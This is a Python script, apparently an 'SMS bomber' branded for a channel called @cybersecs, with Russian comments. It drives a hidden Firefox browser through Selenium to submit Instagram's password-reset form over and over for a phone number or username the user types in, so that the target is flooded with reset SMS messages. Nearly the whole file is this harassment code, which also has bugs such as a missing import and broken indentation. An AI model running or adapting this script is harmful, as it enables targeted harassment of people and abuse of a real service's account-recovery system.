# Импортируем библиотеки (pip install selenium если он не установлен)
from selenium import webdriver
import time


# Логотип
logo = r'''
____ ___ ___ __ __ ____ U _____ u ____
U | __")u / _"\ u / _"\ uU|' \/ '|uU | __")u\| ___"|/U | _"\ u
\| _ \/| / U |/ | / U |/ \| |\/| |/ \| _ \/ | _|" \| |_) |/
| |_) || \// |,-.| \// |,-.| | | | | |_) | | |___ | _ <
|____/ \___/(_/ \___/(_/ |_| |_| |____/ |_____| |_| \_\
_|| \\_ // // <<,-,,-. _|| \\_ << >> // \\_
(__) (__) (__) (__) (./ \.) (__) (__)(__) (__) (__) (__)

by FARBER for @cybersecs

1 of 3
''' # Просим ввести номер
phoneNum = input('Введите номер телефона/username пользователя Instagram: ')

# Делаем окно невидимым
os.environ['MOZ_HEADLESS'] = '1'

# Создаем вебдрайвер
browser = webdriver.Firefox()

# Частота отправки смс
frequency = 10

# Как работает selenium
# Функцией browser.find_element_by_name(‘cppEmailOrUsername‘) 
# мы ищем в коде странницы после name=cppEmailOrUsername,
# функцией browser.find_element_by_tag_name(‘button’) – type=”button”

for i in range(frequency):
# Ссылка на восстановление доступа к аккаунту
browser.get('https://www.instagram.com/accounts/password/reset/?hl=ru')

# Поле для ввода номера/почты/username
number = browser.find_element_by_name('cppEmailOrUsername')

# Selenium введет номер/почту/username
number.send_keys(str(phoneNum))

# Ждем 1 секунду
time.sleep(1)

# Ищем кнопку на которую нужно нажать (она там всего одна :) )
forgot = browser.find_element_by_tag_name('button')

# Нажимаем на кнопку
forgot.click()

# Интервал между смс
time.sleep(10)

# Закрываем браузер
browser.quit()